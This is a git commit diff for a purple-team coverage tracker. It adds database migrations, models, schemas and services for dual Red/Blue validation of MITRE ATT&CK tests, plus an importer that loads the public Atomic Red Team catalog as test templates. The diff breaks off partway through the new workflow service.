feat(phase-11): implement Red/Blue business logic services (T-106, T-107, T-108)

T-106: Create test_workflow_service.py with state-machine transitions for the complete test lifecycle (draft -> red_executing -> blue_evaluating -> in_review -> validated/rejected), dual validation by Red/Blue leads, and reopen capability with field cleanup.

T-107: Update status_service.py to use detection_result from Blue Team instead of legacy result field, and differentiate between partial progress (some validated) vs all-in-progress states.

T-108: Create atomic_import_service.py that downloads the Atomic Red Team repo as a ZIP (avoiding API rate limits), parses all atomics YAML files, and creates idempotent TestTemplate records mapped to MITRE techniques.

Includes validation tests for all three tasks (19 checks total).
This commit is contained in:
2026-02-09 09:58:54 +01:00
parent 086cc5c8bc
commit 7af6be10be
23 changed files with 2053 additions and 45 deletions

View File

@@ -0,0 +1,32 @@
"""add_new_test_states
Revision ID: b001add0test
Revises: a1412d1ef337
Create Date: 2026-02-09 10:00:00.000000
"""
from typing import Sequence, Union
from alembic import op
# revision identifiers, used by Alembic.
revision: str = 'b001add0test'
down_revision: Union[str, Sequence[str], None] = 'a1412d1ef337'
branch_labels: Union[str, Sequence[str], None] = None
depends_on: Union[str, Sequence[str], None] = None
def upgrade() -> None:
"""Add red_executing and blue_evaluating values to the teststate enum."""
op.execute("ALTER TYPE teststate ADD VALUE IF NOT EXISTS 'red_executing' AFTER 'draft'")
op.execute("ALTER TYPE teststate ADD VALUE IF NOT EXISTS 'blue_evaluating' AFTER 'red_executing'")
def downgrade() -> None:
"""Downgrade: removing enum values in PostgreSQL requires recreating the type.
This is intentionally left as a no-op because dropping enum values is
destructive and rarely needed in practice.
"""
pass

View File

@@ -0,0 +1,46 @@
"""add_evidence_team_and_notes
Revision ID: b002evidteam
Revises: b001add0test
Create Date: 2026-02-09 10:01:00.000000
"""
from typing import Sequence, Union
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision: str = 'b002evidteam'
down_revision: Union[str, Sequence[str], None] = 'b001add0test'
branch_labels: Union[str, Sequence[str], None] = None
depends_on: Union[str, Sequence[str], None] = None
def upgrade() -> None:
"""Create teamside enum and add team/notes columns to evidences."""
# Create the new enum type
teamside_enum = postgresql.ENUM('red', 'blue', name='teamside', create_type=False)
op.execute("CREATE TYPE teamside AS ENUM ('red', 'blue')")
# Add columns
op.add_column('evidences', sa.Column(
'team',
teamside_enum,
nullable=False,
server_default='red',
))
op.add_column('evidences', sa.Column(
'notes',
sa.Text(),
nullable=True,
))
def downgrade() -> None:
"""Remove team/notes columns and drop teamside enum."""
op.drop_column('evidences', 'notes')
op.drop_column('evidences', 'team')
op.execute("DROP TYPE IF EXISTS teamside")

View File

@@ -0,0 +1,87 @@
"""add_dual_validation_fields_to_tests
Revision ID: b003dualvalid
Revises: b002evidteam
Create Date: 2026-02-09 10:02:00.000000
"""
from typing import Sequence, Union
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision: str = 'b003dualvalid'
down_revision: Union[str, Sequence[str], None] = 'b002evidteam'
branch_labels: Union[str, Sequence[str], None] = None
depends_on: Union[str, Sequence[str], None] = None
def upgrade() -> None:
"""Drop legacy validated_by/validated_at and add dual validation columns."""
# Drop legacy single-validation columns
op.drop_constraint('tests_validated_by_fkey', 'tests', type_='foreignkey')
op.drop_column('tests', 'validated_by')
op.drop_column('tests', 'validated_at')
# ── Red Team fields ─────────────────────────────────────────
op.add_column('tests', sa.Column('red_summary', sa.Text(), nullable=True))
op.add_column('tests', sa.Column('attack_success', sa.Boolean(), nullable=True))
op.add_column('tests', sa.Column('red_validated_by', sa.UUID(), nullable=True))
op.add_column('tests', sa.Column('red_validated_at', sa.DateTime(), nullable=True))
op.add_column('tests', sa.Column('red_validation_status', sa.String(), nullable=True))
op.add_column('tests', sa.Column('red_validation_notes', sa.Text(), nullable=True))
# ── Blue Team fields ────────────────────────────────────────
op.add_column('tests', sa.Column('blue_summary', sa.Text(), nullable=True))
op.add_column('tests', sa.Column(
'detection_result',
postgresql.ENUM('detected', 'not_detected', 'partially_detected',
name='testresult', create_type=False),
nullable=True,
))
op.add_column('tests', sa.Column('blue_validated_by', sa.UUID(), nullable=True))
op.add_column('tests', sa.Column('blue_validated_at', sa.DateTime(), nullable=True))
op.add_column('tests', sa.Column('blue_validation_status', sa.String(), nullable=True))
op.add_column('tests', sa.Column('blue_validation_notes', sa.Text(), nullable=True))
# ── Foreign keys ────────────────────────────────────────────
op.create_foreign_key(
'fk_tests_red_validated_by', 'tests', 'users',
['red_validated_by'], ['id'],
)
op.create_foreign_key(
'fk_tests_blue_validated_by', 'tests', 'users',
['blue_validated_by'], ['id'],
)
def downgrade() -> None:
"""Reverse: drop dual validation columns and restore legacy columns."""
# Drop FKs
op.drop_constraint('fk_tests_blue_validated_by', 'tests', type_='foreignkey')
op.drop_constraint('fk_tests_red_validated_by', 'tests', type_='foreignkey')
# Drop new columns
op.drop_column('tests', 'blue_validation_notes')
op.drop_column('tests', 'blue_validation_status')
op.drop_column('tests', 'blue_validated_at')
op.drop_column('tests', 'blue_validated_by')
op.drop_column('tests', 'detection_result')
op.drop_column('tests', 'blue_summary')
op.drop_column('tests', 'red_validation_notes')
op.drop_column('tests', 'red_validation_status')
op.drop_column('tests', 'red_validated_at')
op.drop_column('tests', 'red_validated_by')
op.drop_column('tests', 'attack_success')
op.drop_column('tests', 'red_summary')
# Restore legacy columns
op.add_column('tests', sa.Column('validated_by', sa.UUID(), nullable=True))
op.add_column('tests', sa.Column('validated_at', sa.DateTime(), nullable=True))
op.create_foreign_key(
'tests_validated_by_fkey', 'tests', 'users',
['validated_by'], ['id'],
)

View File

@@ -0,0 +1,54 @@
"""add_test_templates_table
Revision ID: b004templates
Revises: b003dualvalid
Create Date: 2026-02-09 10:03:00.000000
"""
from typing import Sequence, Union
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision: str = 'b004templates'
down_revision: Union[str, Sequence[str], None] = 'b003dualvalid'
branch_labels: Union[str, Sequence[str], None] = None
depends_on: Union[str, Sequence[str], None] = None
def upgrade() -> None:
"""Create the test_templates table with indexes."""
op.create_table(
'test_templates',
sa.Column('id', sa.UUID(), nullable=False, default=sa.text('gen_random_uuid()')),
sa.Column('mitre_technique_id', sa.String(), nullable=False),
sa.Column('name', sa.String(), nullable=False),
sa.Column('description', sa.Text(), nullable=True),
sa.Column('source', sa.String(), nullable=False),
sa.Column('source_url', sa.String(), nullable=True),
sa.Column('attack_procedure', sa.Text(), nullable=True),
sa.Column('expected_detection', sa.Text(), nullable=True),
sa.Column('platform', sa.String(), nullable=True),
sa.Column('tool_suggested', sa.String(), nullable=True),
sa.Column('severity', sa.String(), nullable=True),
sa.Column('atomic_test_id', sa.String(), nullable=True),
sa.Column('is_active', sa.Boolean(), nullable=True, server_default=sa.text('true')),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.PrimaryKeyConstraint('id'),
)
op.create_index('ix_test_templates_mitre_technique_id', 'test_templates', ['mitre_technique_id'])
op.create_index('ix_test_templates_source', 'test_templates', ['source'])
op.create_index('ix_test_templates_platform', 'test_templates', ['platform'])
op.create_index('ix_test_templates_severity', 'test_templates', ['severity'])
def downgrade() -> None:
"""Drop the test_templates table and its indexes."""
op.drop_index('ix_test_templates_severity', table_name='test_templates')
op.drop_index('ix_test_templates_platform', table_name='test_templates')
op.drop_index('ix_test_templates_source', table_name='test_templates')
op.drop_index('ix_test_templates_mitre_technique_id', table_name='test_templates')
op.drop_table('test_templates')

View File

@@ -0,0 +1,55 @@
"""add_v2_indexes
Revision ID: b005v2indexes
Revises: b004templates
Create Date: 2026-02-09 10:04:00.000000
"""
from typing import Sequence, Union
from alembic import op
# revision identifiers, used by Alembic.
revision: str = 'b005v2indexes'
down_revision: Union[str, Sequence[str], None] = 'b004templates'
branch_labels: Union[str, Sequence[str], None] = None
depends_on: Union[str, Sequence[str], None] = None
def upgrade() -> None:
"""Create performance indexes for V2 queries."""
# ── Tests ───────────────────────────────────────────────────
op.create_index('ix_tests_state', 'tests', ['state'])
op.create_index('ix_tests_technique_id', 'tests', ['technique_id'])
op.create_index('ix_tests_created_by', 'tests', ['created_by'])
op.create_index('ix_tests_red_validation_status', 'tests', ['red_validation_status'])
op.create_index('ix_tests_blue_validation_status', 'tests', ['blue_validation_status'])
# ── Evidences ───────────────────────────────────────────────
op.create_index('ix_evidences_test_id', 'evidences', ['test_id'])
op.create_index('ix_evidences_team', 'evidences', ['team'])
# ── Techniques (if not already present from MVP) ────────────
op.create_index('ix_techniques_tactic', 'techniques', ['tactic'])
op.create_index('ix_techniques_status_global', 'techniques', ['status_global'])
op.create_index('ix_techniques_review_required', 'techniques', ['review_required'])
def downgrade() -> None:
"""Drop all V2 indexes."""
# Techniques
op.drop_index('ix_techniques_review_required', table_name='techniques')
op.drop_index('ix_techniques_status_global', table_name='techniques')
op.drop_index('ix_techniques_tactic', table_name='techniques')
# Evidences
op.drop_index('ix_evidences_team', table_name='evidences')
op.drop_index('ix_evidences_test_id', table_name='evidences')
# Tests
op.drop_index('ix_tests_blue_validation_status', table_name='tests')
op.drop_index('ix_tests_red_validation_status', table_name='tests')
op.drop_index('ix_tests_created_by', table_name='tests')
op.drop_index('ix_tests_technique_id', table_name='tests')
op.drop_index('ix_tests_state', table_name='tests')

View File

@@ -2,12 +2,14 @@
from app.models.user import User
from app.models.technique import Technique
from app.models.test import Test
from app.models.test_template import TestTemplate
from app.models.evidence import Evidence
from app.models.intel import IntelItem
from app.models.audit import AuditLog
from app.models.enums import TechniqueStatus, TestState, TestResult
from app.models.enums import TechniqueStatus, TestState, TestResult, TeamSide
__all__ = [
"User", "Technique", "Test", "Evidence", "IntelItem", "AuditLog",
"TechniqueStatus", "TestState", "TestResult"
"User", "Technique", "Test", "TestTemplate", "Evidence",
"IntelItem", "AuditLog",
"TechniqueStatus", "TestState", "TestResult", "TeamSide",
]

View File

@@ -12,11 +12,18 @@ class TechniqueStatus(str, enum.Enum):
class TestState(str, enum.Enum):
draft = "draft"
red_executing = "red_executing" # Red Team documenting attack
blue_evaluating = "blue_evaluating" # Blue Team evaluating detection
in_review = "in_review"
validated = "validated"
rejected = "rejected"
class TeamSide(str, enum.Enum):
red = "red"
blue = "blue"
class TestResult(str, enum.Enum):
detected = "detected"
not_detected = "not_detected"

View File

@@ -1,11 +1,12 @@
import uuid
from datetime import datetime
from sqlalchemy import Column, String, DateTime, ForeignKey
from sqlalchemy import Column, String, Text, DateTime, ForeignKey, Enum
from sqlalchemy.dialects.postgresql import UUID
from sqlalchemy.orm import relationship
from app.database import Base
from app.models.enums import TeamSide
class Evidence(Base):
@@ -14,6 +15,9 @@ class Evidence(Base):
Files are stored in MinIO, and this model tracks the file location,
integrity hash, and upload metadata.
The ``team`` field distinguishes whether this evidence was uploaded by
Red Team (attack evidence) or Blue Team (detection evidence).
"""
__tablename__ = "evidences"
@@ -24,6 +28,8 @@ class Evidence(Base):
sha256_hash = Column(String, nullable=False)
uploaded_by = Column(UUID(as_uuid=True), ForeignKey("users.id"), nullable=True)
uploaded_at = Column(DateTime, default=datetime.utcnow)
team = Column(Enum(TeamSide, name="teamside"), nullable=False, default=TeamSide.red)
notes = Column(Text, nullable=True)
# Relationships
test = relationship("Test", back_populates="evidences")

View File

@@ -1,7 +1,7 @@
import uuid
from datetime import datetime
from sqlalchemy import Column, String, Text, DateTime, ForeignKey, Enum
from sqlalchemy import Column, String, Text, Boolean, DateTime, ForeignKey, Enum
from sqlalchemy.dialects.postgresql import UUID
from sqlalchemy.orm import relationship
@@ -14,10 +14,12 @@ class Test(Base):
Test model representing a security test for a MITRE ATT&CK technique.
Each test documents an attempt to validate coverage of a specific technique,
including the procedure, tools used, and outcome.
including the procedure, tools used, and outcome. V2 introduces dual
validation: Red Lead and Blue Lead must each approve independently.
"""
__tablename__ = "tests"
# ── Core fields ─────────────────────────────────────────────────
id = Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
technique_id = Column(UUID(as_uuid=True), ForeignKey("techniques.id"), nullable=False)
name = Column(String, nullable=False)
@@ -29,12 +31,27 @@ class Test(Base):
created_by = Column(UUID(as_uuid=True), ForeignKey("users.id"), nullable=True)
result = Column(Enum(TestResult, name="testresult"), nullable=True)
state = Column(Enum(TestState, name="teststate"), default=TestState.draft)
validated_by = Column(UUID(as_uuid=True), ForeignKey("users.id"), nullable=True)
validated_at = Column(DateTime, nullable=True)
created_at = Column(DateTime, default=datetime.utcnow)
# Relationships
# ── Red Team fields ─────────────────────────────────────────────
red_summary = Column(Text, nullable=True)
attack_success = Column(Boolean, nullable=True)
red_validated_by = Column(UUID(as_uuid=True), ForeignKey("users.id"), nullable=True)
red_validated_at = Column(DateTime, nullable=True)
red_validation_status = Column(String, nullable=True) # pending / approved / rejected
red_validation_notes = Column(Text, nullable=True)
# ── Blue Team fields ────────────────────────────────────────────
blue_summary = Column(Text, nullable=True)
detection_result = Column(Enum(TestResult, name="testresult"), nullable=True)
blue_validated_by = Column(UUID(as_uuid=True), ForeignKey("users.id"), nullable=True)
blue_validated_at = Column(DateTime, nullable=True)
blue_validation_status = Column(String, nullable=True) # pending / approved / rejected
blue_validation_notes = Column(Text, nullable=True)
# ── Relationships ───────────────────────────────────────────────
technique = relationship("Technique", back_populates="tests")
evidences = relationship("Evidence", back_populates="test")
creator = relationship("User", foreign_keys=[created_by])
validator = relationship("User", foreign_keys=[validated_by])
red_validator = relationship("User", foreign_keys=[red_validated_by])
blue_validator = relationship("User", foreign_keys=[blue_validated_by])

View File

@@ -0,0 +1,45 @@
"""TestTemplate model — predefined test catalog entries."""
import uuid
from datetime import datetime
from sqlalchemy import Column, String, Text, Boolean, DateTime, Index
from sqlalchemy.dialects.postgresql import UUID
from app.database import Base
class TestTemplate(Base):
"""
Predefined test template mapped to a MITRE ATT&CK technique.
Templates come from several sources:
- **atomic_red_team**: Atomic Red Team by Red Canary
- **mitre**: MITRE ATT&CK procedure examples
- **custom**: Manually created by teams
Users can instantiate a real Test from a template.
"""
__tablename__ = "test_templates"
id = Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
mitre_technique_id = Column(String, nullable=False) # e.g. "T1059.001"
name = Column(String, nullable=False)
description = Column(Text, nullable=True)
source = Column(String, nullable=False) # atomic_red_team / mitre / custom
source_url = Column(String, nullable=True)
attack_procedure = Column(Text, nullable=True) # Suggested attack procedure
expected_detection = Column(Text, nullable=True) # What blue team should detect
platform = Column(String, nullable=True) # windows / linux / macos
tool_suggested = Column(String, nullable=True)
severity = Column(String, nullable=True) # low / medium / high / critical
atomic_test_id = Column(String, nullable=True) # ID in Atomic Red Team repo
is_active = Column(Boolean, default=True)
created_at = Column(DateTime, default=datetime.utcnow)
__table_args__ = (
Index('ix_test_templates_mitre_technique_id', 'mitre_technique_id'),
Index('ix_test_templates_source', 'source'),
Index('ix_test_templates_platform', 'platform'),
Index('ix_test_templates_severity', 'severity'),
)

View File

@@ -128,5 +128,7 @@ def _evidence_to_out(evidence: Evidence) -> EvidenceOut:
sha256_hash=evidence.sha256_hash,
uploaded_by=evidence.uploaded_by,
uploaded_at=evidence.uploaded_at,
team=evidence.team,
notes=evidence.notes,
download_url=get_presigned_url(evidence.file_path),
)

View File

@@ -166,10 +166,11 @@ def validate_test(
db: Session = Depends(get_db),
current_user: User = Depends(require_any_role("red_lead", "blue_lead")),
):
"""Mark a test as validated.
"""Validate the red or blue side of a test (dual validation).
Sets ``state`` to *validated*, records ``validated_by`` / ``validated_at``,
stores the ``result``, and recalculates the parent technique's global status.
Red Lead approves/rejects the red side; Blue Lead approves/rejects the
blue side. When *both* sides are approved the test state moves to
``validated``. If either side is rejected the state moves to ``rejected``.
"""
test = (
db.query(Test)
@@ -184,10 +185,39 @@ def validate_test(
detail="Test not found",
)
test.state = TestState.validated
now = datetime.utcnow()
if current_user.role in ("red_lead", "admin"):
test.red_validation_status = payload.result.value
test.red_validated_by = current_user.id
test.red_validated_at = now
side = "red"
elif current_user.role == "blue_lead":
test.blue_validation_status = payload.result.value
test.blue_validated_by = current_user.id
test.blue_validated_at = now
side = "blue"
else:
raise HTTPException(
status_code=status.HTTP_403_FORBIDDEN,
detail="Not enough permissions to validate",
)
# Store the overall result from the payload
test.result = payload.result
test.validated_by = current_user.id
test.validated_at = datetime.utcnow()
# Determine aggregate state
red_ok = test.red_validation_status == "approved"
blue_ok = test.blue_validation_status == "approved"
red_rej = test.red_validation_status == "rejected"
blue_rej = test.blue_validation_status == "rejected"
if red_ok and blue_ok:
test.state = TestState.validated
elif red_rej or blue_rej:
test.state = TestState.rejected
else:
test.state = TestState.in_review
db.commit()
db.refresh(test)
@@ -203,6 +233,7 @@ def validate_test(
entity_type="test",
entity_id=test.id,
details={
"side": side,
"result": payload.result.value,
"technique_id": str(test.technique_id),
},

View File

@@ -14,9 +14,20 @@ from app.schemas.test import (
TestOut,
TestUpdate,
TestValidate,
TestRedUpdate,
TestBlueUpdate,
TestRedValidate,
TestBlueValidate,
)
from app.schemas.evidence import EvidenceOut
from app.schemas.evidence import EvidenceOut, EvidenceUpload
from app.schemas.test_template import (
TestTemplateOut,
TestTemplateCreate,
TestTemplateSummary,
TestTemplateInstantiate,
)
__all__ = [
# Auth
@@ -33,6 +44,16 @@ __all__ = [
"TestOut",
"TestUpdate",
"TestValidate",
"TestRedUpdate",
"TestBlueUpdate",
"TestRedValidate",
"TestBlueValidate",
# Evidence
"EvidenceOut",
"EvidenceUpload",
# Test Template
"TestTemplateOut",
"TestTemplateCreate",
"TestTemplateSummary",
"TestTemplateInstantiate",
]

View File

@@ -5,6 +5,8 @@ from datetime import datetime
from pydantic import BaseModel, ConfigDict
from app.models.enums import TeamSide
class EvidenceOut(BaseModel):
"""Representation of an evidence record returned by the API.
@@ -18,6 +20,15 @@ class EvidenceOut(BaseModel):
sha256_hash: str
uploaded_by: uuid.UUID | None = None
uploaded_at: datetime | None = None
team: TeamSide = TeamSide.red
notes: str | None = None
download_url: str | None = None
model_config = ConfigDict(from_attributes=True)
class EvidenceUpload(BaseModel):
"""Metadata sent alongside an evidence file upload."""
team: TeamSide
notes: str | None = None

View File

@@ -10,6 +10,7 @@ from app.models.enums import TestResult, TestState
# ── Create ──────────────────────────────────────────────────────────
class TestCreate(BaseModel):
"""Payload for creating a new test."""
@@ -21,7 +22,8 @@ class TestCreate(BaseModel):
tool_used: str | None = None
# ── Update ──────────────────────────────────────────────────────────
# ── Update (general) ───────────────────────────────────────────────
class TestUpdate(BaseModel):
"""Payload for partially updating an existing test.
@@ -35,8 +37,63 @@ class TestUpdate(BaseModel):
result: TestResult | None = None
# ── Red Team update ────────────────────────────────────────────────
class TestRedUpdate(BaseModel):
"""Fields that Red Team fills in during the red_executing phase."""
name: str | None = None
description: str | None = None
procedure_text: str | None = None
tool_used: str | None = None
attack_success: bool | None = None
red_summary: str | None = None
# ── Blue Team update ───────────────────────────────────────────────
class TestBlueUpdate(BaseModel):
"""Fields that Blue Team fills in during the blue_evaluating phase."""
detection_result: TestResult | None = None
blue_summary: str | None = None
# ── Red Lead validation ────────────────────────────────────────────
class TestRedValidate(BaseModel):
"""Payload sent by Red Lead to approve/reject the red side."""
red_validation_status: str # "approved" or "rejected"
red_validation_notes: str | None = None
# ── Blue Lead validation ───────────────────────────────────────────
class TestBlueValidate(BaseModel):
"""Payload sent by Blue Lead to approve/reject the blue side."""
blue_validation_status: str # "approved" or "rejected"
blue_validation_notes: str | None = None
# ── Legacy validate (kept for backwards compat) ────────────────────
class TestValidate(BaseModel):
"""Payload sent by a reviewer to validate / reject a test."""
result: TestResult
comments: str | None = None
# ── Read (full) ─────────────────────────────────────────────────────
class TestOut(BaseModel):
"""Complete representation returned by the API."""
@@ -51,17 +108,22 @@ class TestOut(BaseModel):
created_by: uuid.UUID | None = None
result: TestResult | None = None
state: TestState = TestState.draft
validated_by: uuid.UUID | None = None
validated_at: datetime | None = None
created_at: datetime | None = None
# Red Team fields
red_summary: str | None = None
attack_success: bool | None = None
red_validated_by: uuid.UUID | None = None
red_validated_at: datetime | None = None
red_validation_status: str | None = None
red_validation_notes: str | None = None
# Blue Team fields
blue_summary: str | None = None
detection_result: TestResult | None = None
blue_validated_by: uuid.UUID | None = None
blue_validated_at: datetime | None = None
blue_validation_status: str | None = None
blue_validation_notes: str | None = None
model_config = ConfigDict(from_attributes=True)
# ── Validate ────────────────────────────────────────────────────────
class TestValidate(BaseModel):
"""Payload sent by a reviewer to validate / reject a test."""
result: TestResult
comments: str | None = None

View File

@@ -0,0 +1,75 @@
"""Pydantic schemas for TestTemplate endpoints."""
import uuid
from datetime import datetime
from pydantic import BaseModel, ConfigDict
# ── Full output ─────────────────────────────────────────────────────
class TestTemplateOut(BaseModel):
"""Complete representation of a test template."""
id: uuid.UUID
mitre_technique_id: str
name: str
description: str | None = None
source: str
source_url: str | None = None
attack_procedure: str | None = None
expected_detection: str | None = None
platform: str | None = None
tool_suggested: str | None = None
severity: str | None = None
atomic_test_id: str | None = None
is_active: bool = True
created_at: datetime | None = None
model_config = ConfigDict(from_attributes=True)
# ── Create ──────────────────────────────────────────────────────────
class TestTemplateCreate(BaseModel):
"""Payload for creating a custom test template."""
mitre_technique_id: str
name: str
description: str | None = None
source: str = "custom"
source_url: str | None = None
attack_procedure: str | None = None
expected_detection: str | None = None
platform: str | None = None
tool_suggested: str | None = None
severity: str | None = None
atomic_test_id: str | None = None
# ── Summary (for listings) ─────────────────────────────────────────
class TestTemplateSummary(BaseModel):
"""Lightweight representation for listing templates."""
id: uuid.UUID
mitre_technique_id: str
name: str
source: str
platform: str | None = None
severity: str | None = None
model_config = ConfigDict(from_attributes=True)
# ── Instantiate (create a real Test from a template) ────────────────
class TestTemplateInstantiate(BaseModel):
"""Payload to create a real test from an existing template."""
template_id: uuid.UUID
technique_id: uuid.UUID

View File

@@ -0,0 +1,231 @@
"""Atomic Red Team import service.
Downloads the Atomic Red Team repository ZIP from GitHub, parses every
``atomics/T*/T*.yaml`` file, and upserts :class:`TestTemplate` records
into the database.
Strategy
--------
The GitHub REST API without authentication only allows 60 req/hour.
Since the Atomic Red Team repo contains 1 500+ YAML files we avoid
per-file requests entirely. Instead we:
1. Download the full repo as a ZIP archive (~40 MB).
2. Extract in a temporary directory.
3. Walk ``atomics/T*/T*.yaml`` files parsing them with PyYAML.
4. Create / update ``TestTemplate`` rows keyed by ``atomic_test_id``.
5. Clean up the temporary directory.
Idempotency
-----------
Running the import twice does **not** create duplicates. Existing
templates are identified by their ``atomic_test_id`` and simply skipped.
"""
import io
import logging
import os
import shutil
import tempfile
import zipfile
from pathlib import Path
import requests as _requests
import yaml
from sqlalchemy.orm import Session
from app.models.test_template import TestTemplate
from app.services.audit_service import log_action
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Constants
# ---------------------------------------------------------------------------
ATOMIC_RT_ZIP_URL = (
"https://github.com/redcanaryco/atomic-red-team"
"/archive/refs/heads/master.zip"
)
# Request timeout for the ZIP download (seconds)
_DOWNLOAD_TIMEOUT = 300
# Top-level directory name inside the ZIP
_ZIP_ROOT_PREFIX = "atomic-red-team-master"
# ---------------------------------------------------------------------------
# Internal helpers
# ---------------------------------------------------------------------------
def _download_zip(url: str = ATOMIC_RT_ZIP_URL) -> bytes:
"""Download the Atomic Red Team ZIP and return its raw bytes."""
logger.info("Downloading Atomic Red Team ZIP from %s", url)
resp = _requests.get(url, timeout=_DOWNLOAD_TIMEOUT, stream=True)
resp.raise_for_status()
content = resp.content
logger.info("Downloaded %.1f MB", len(content) / (1024 * 1024))
return content
def _extract_zip(zip_bytes: bytes, dest: str) -> Path:
"""Extract *zip_bytes* into *dest* and return the path to the atomics/ dir."""
with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
zf.extractall(dest)
atomics_dir = Path(dest) / _ZIP_ROOT_PREFIX / "atomics"
if not atomics_dir.is_dir():
raise FileNotFoundError(
f"Expected atomics directory not found at {atomics_dir}"
)
return atomics_dir
def _parse_yaml_files(atomics_dir: Path) -> list[dict]:
"""Walk the atomics directory and parse all technique YAML files.
Returns a flat list of dicts, each representing a single atomic test
with the following keys::
technique_id, index, name, description, platforms,
executor_type, command, source_url
"""
results: list[dict] = []
yaml_files = sorted(atomics_dir.glob("T*/T*.yaml"))
logger.info("Found %d YAML files to parse", len(yaml_files))
for yaml_path in yaml_files:
technique_id = yaml_path.stem # e.g. "T1059.001"
try:
with open(yaml_path, "r", encoding="utf-8") as fh:
data = yaml.safe_load(fh)
except Exception as exc:
logger.warning("Failed to parse %s: %s", yaml_path, exc)
continue
if not data or "atomic_tests" not in data:
continue
for idx, test in enumerate(data["atomic_tests"]):
name = test.get("name", "").strip()
description = test.get("description", "").strip()
platforms = test.get("supported_platforms", [])
executor = test.get("executor", {})
executor_type = executor.get("name", "") if isinstance(executor, dict) else ""
command = executor.get("command", "") if isinstance(executor, dict) else ""
# Build an atomic_test_id in the format "T1059.001-0"
atomic_test_id = f"{technique_id}-{idx}"
source_url = (
f"https://github.com/redcanaryco/atomic-red-team/blob/master"
f"/atomics/{technique_id}/{technique_id}.yaml"
)
results.append({
"technique_id": technique_id,
"index": idx,
"atomic_test_id": atomic_test_id,
"name": name,
"description": description,
"platforms": ", ".join(platforms) if isinstance(platforms, list) else str(platforms),
"executor_type": executor_type,
"command": command[:4000] if command else None, # cap at 4k chars
"source_url": source_url,
})
logger.info("Parsed %d atomic tests total", len(results))
return results
# ---------------------------------------------------------------------------
# Public API
# ---------------------------------------------------------------------------
def import_atomic_red_team(db: Session) -> dict:
"""Download and import Atomic Red Team tests as TestTemplates.
Parameters
----------
db : Session
Active SQLAlchemy database session.
Returns
-------
dict
Summary with keys ``created``, ``skipped_existing``,
``yaml_files_parsed``, ``total_tests_parsed``.
"""
tmp_dir = tempfile.mkdtemp(prefix="aegis_atomic_")
try:
zip_bytes = _download_zip()
atomics_dir = _extract_zip(zip_bytes, tmp_dir)
parsed_tests = _parse_yaml_files(atomics_dir)
finally:
# Always clean up
shutil.rmtree(tmp_dir, ignore_errors=True)
logger.info("Cleaned up temp directory %s", tmp_dir)
# Pre-load existing atomic_test_ids for dedup
existing_ids: set[str] = {
row[0]
for row in db.query(TestTemplate.atomic_test_id)
.filter(TestTemplate.atomic_test_id.isnot(None))
.all()
}
created = 0
skipped = 0
for item in parsed_tests:
if item["atomic_test_id"] in existing_ids:
skipped += 1
continue
template = TestTemplate(
mitre_technique_id=item["technique_id"],
name=item["name"][:500] if item["name"] else f"Atomic Test {item['atomic_test_id']}",
description=item["description"][:2000] if item["description"] else None,
source="atomic_red_team",
source_url=item["source_url"],
attack_procedure=item["command"],
platform=item["platforms"],
tool_suggested=item["executor_type"] if item["executor_type"] else None,
atomic_test_id=item["atomic_test_id"],
is_active=True,
)
db.add(template)
existing_ids.add(item["atomic_test_id"])
created += 1
db.commit()
# Count distinct YAML files by technique_id
yaml_files_count = len({t["technique_id"] for t in parsed_tests})
summary = {
"created": created,
"skipped_existing": skipped,
"yaml_files_parsed": yaml_files_count,
"total_tests_parsed": len(parsed_tests),
}
logger.info(
"Atomic Red Team import complete — created=%d, skipped=%d, "
"yaml_files=%d, total_tests=%d",
created, skipped, yaml_files_count, len(parsed_tests),
)
# Audit log (system action)
log_action(
db,
user_id=None,
action="import_atomic_red_team",
entity_type="test_template",
entity_id=None,
details=summary,
)
return summary

View File

@@ -1,36 +1,46 @@
"""Service for recalculating the global status of a Technique
based on the state and result of its associated tests."""
based on the state and result of its associated tests.
V2 rules account for dual Red/Blue validation and use
``detection_result`` (filled by Blue Team) instead of the legacy
``result`` field.
"""
from sqlalchemy.orm import Session
from app.models.enums import TechniqueStatus
from app.models.enums import TechniqueStatus, TestState
from app.models.technique import Technique
def recalculate_technique_status(db: Session, technique: Technique) -> None:
"""Recompute ``technique.status_global`` from its tests and commit.
Rules
-----
- No tests → ``not_evaluated``
- Any test not yet ``validated`` → ``in_progress``
- All validated and all ``detected`` → ``validated``
- All validated and any ``partially_detected`` → ``partial``
Rules (v2)
----------
1. No tests → ``not_evaluated``
2. All tests ``validated`` → look at detection results:
- All ``detected`` → ``validated``
- Any ``partially_detected`` → ``partial``
- Otherwise → ``not_covered``
3. Some tests ``validated``, others still in progress → ``partial``
4. All tests in intermediate states (no validated) → ``in_progress``
"""
tests = technique.tests
if not tests:
technique.status_global = TechniqueStatus.not_evaluated
elif any(t.state != "validated" for t in tests):
technique.status_global = TechniqueStatus.in_progress
else:
results = [t.result for t in tests]
if all(r == "detected" for r in results):
elif all(t.state == TestState.validated for t in tests):
# All validated — inspect detection results
results = [t.detection_result for t in tests if t.detection_result]
if results and all(str(r) == "detected" or r == "detected" for r in results):
technique.status_global = TechniqueStatus.validated
elif any(r == "partially_detected" for r in results):
elif any(str(r) == "partially_detected" or r == "partially_detected" for r in results):
technique.status_global = TechniqueStatus.partial
else:
technique.status_global = TechniqueStatus.not_covered
elif any(t.state == TestState.validated for t in tests):
technique.status_global = TechniqueStatus.partial
else:
technique.status_global = TechniqueStatus.in_progress
db.commit()

View File

@@ -0,0 +1,285 @@
"""Test workflow service — state-machine transitions for the Red/Blue validation flow.
Controls which state transitions are valid and exposes high-level helpers
for each step in the test lifecycle:
draft → red_executing → blue_evaluating → in_review → validated / rejected
rejected → draft
Every public function validates the transition, mutates the test, writes an
audit-log entry, and commits the session.
"""
from datetime import datetime
from fastapi import HTTPException, status
from sqlalchemy.orm import Session
from app.models.enums import TestState
from app.models.test import Test
from app.models.user import User
from app.services.audit_service import log_action
# ---------------------------------------------------------------------------
# Valid transition map
# ---------------------------------------------------------------------------
VALID_TRANSITIONS: dict[TestState, list[TestState]] = {
TestState.draft: [TestState.red_executing],
TestState.red_executing: [TestState.blue_evaluating],
